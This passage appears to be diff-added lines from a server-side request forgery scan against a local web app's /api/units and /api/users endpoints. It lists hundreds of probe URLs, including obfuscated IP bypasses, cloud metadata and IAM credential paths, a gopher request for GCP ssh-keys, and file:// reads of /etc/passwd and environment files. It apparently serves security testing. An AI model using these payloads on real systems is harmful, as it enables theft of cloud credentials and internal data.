`http://localhost:4200/api/units?url=7147006462` +- Testing: `http://localhost:4200/api/units?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/units?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/units?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/units?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/units?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/units?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/units?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/units?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/units?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/units?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/units?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/units?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/units?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/units?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/units?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/units?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/units?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/units?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/units?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/units?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/units?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/units?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/units?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/units?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/units?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/units?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/units?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/units?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/units?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/units?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/units?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/units?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/units?url=127.0.0.0` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/units?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/units?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/units?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/units?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/units?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/units?url=3232235521` +- Testing: `http://localhost:4200/api/units?url=3232235777` +- Testing: `http://localhost:4200/api/units?url=425.510.425.510` +- Testing: `http://localhost:4200/api/units?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/units?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/units?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/units?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/units?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/units?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/units?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/units?url=instance-data` +- Testing: `http://localhost:4200/api/units?url=localhost%3A22` +- Testing: `http://localhost:4200/api/units?url=localhost%3A443` +- Testing: `http://localhost:4200/api/units?url=localhost%3A80` +- Testing: `http://localhost:4200/api/units?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/units?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/units?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/units?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/units?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/units?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/units?url=loopback` +- Testing: `http://localhost:4200/api/units?url=loopback%3A22` +- Testing: `http://localhost:4200/api/units?url=loopback%3A80` +- Testing: `http://localhost:4200/api/units?url=loopback%3A443` +- Testing: `http://localhost:4200/api/units?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/units?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/units?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/units?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/units?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/units?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/units?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/units?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/units?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/units?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/units?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/units?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/units?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/units?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/units?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/units?url=127.1%3A80` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/units?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/units?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/units?url=2130706433%2F` +- Testing: `http://localhost:4200/api/units?url=3232235521%2F` +- Testing: `http://localhost:4200/api/units?url=3232235777%2F` +- Testing: `http://localhost:4200/api/units?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/units?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/units?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/units?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/units?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/units?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/units?url=0%2F` +- Testing: `http://localhost:4200/api/units?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/users +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/users?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/users?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/users?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/users?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/users?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/users?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/users?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/users?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/users?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/users?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/users?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/users?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/users?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/users?url=127.1%3A80` +- Testing: `http://localhost:4200/api/users?url=0` +- Testing: `http://localhost:4200/api/users?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/users?url=localhost%3A80` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/users?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/users?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/users?url=127.127.127.127` +- Testing: `http://localhost:4200/api/users?url=127.0.1.3` +- Testing: `http://localhost:4200/api/users?url=127.0.0.0` +- Testing: `http://localhost:4200/api/users?url=2130706433` +- Testing: `http://localhost:4200/api/users?url=017700000001` +- Testing: `http://localhost:4200/api/users?url=0x7f000001` +- Testing: `http://localhost:4200/api/users?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/users?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/users?url=` +- Testing: `http://localhost:4200/api/users?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/users?url=` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/users?url=` +- Testing: `http://localhost:4200/api/users?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/users?url=` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/users?url=` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/users?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/users?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/users?url=google.com.localhost` +- Testing: `http://localhost:4200/api/users?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/users?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/users?url=` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/users?url=` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/users?url=` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/users?url=localtest.me` +- Testing: `http://localhost:4200/api/users?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/users?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/users?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/users?url=2130706433%2F` +- Testing: `http://localhost:4200/api/users?url=3232235521%2F` +- Testing: `http://localhost:4200/api/users?url=3232235777%2F` +- Testing: `http://localhost:4200/api/users?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/users?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1` +- Testing: `http://localhost:4200/api/users?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/users?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/users?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/users?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/users?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/users?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/users?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/users?url=0%2F` +- Testing: `http://localhost:4200/api/users?url=127.1` +- Testing: `http://localhost:4200/api/users?url=127.0.1` +- Testing: `http://localhost:4200/api/users?url=localtest.me` +- Testing: `http://localhost:4200/api/users?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/users?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/users?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/users?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/users?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/users?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/users?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/users?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/users?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=127.0.1.3` +- Testing: `http://localhost:4200/api/users?url=0` +- Testing: `http://localhost:4200/api/users?url=127.1` +- Testing: `http://localhost:4200/api/users?url=127.0.1` +- Testing: `http://localhost:4200/api/users?url=localhost` +- Testing: `http://localhost:4200/api/users?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/users?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/users?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/users?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/users?url=7F000001` +- Testing: `http://localhost:4200/api/users?url=2130706433` +- Testing: `http://localhost:4200/api/users?url=6425673729` +- Testing: `http://localhost:4200/api/users?url=127001` +- Testing: `http://localhost:4200/api/users?url=127_0._0_1` +- Testing: `http://localhost:4200/api/users?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/users?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/users?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/users?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/users?url=localtest.me` +- Testing: `http://localhost:4200/api/users?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/users?url=127.127.127.127` +- Testing: `http://localhost:4200/api/users?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/users?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/users?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/users?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/users?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/users?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/users?url=0x7f000001` +- Testing: `http://localhost:4200/api/users?url=017700000001` +- Testing: `http://localhost:4200/api/users?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/users?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/users?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/users?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/users?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/users?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/users?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/users?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/users?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/users?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254` +- Testing: `http://localhost:4200/api/users?url=2852039166` +- Testing: `http://localhost:4200/api/users?url=7147006462` +- Testing: `http://localhost:4200/api/users?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/users?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/users?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/users?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/users?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: 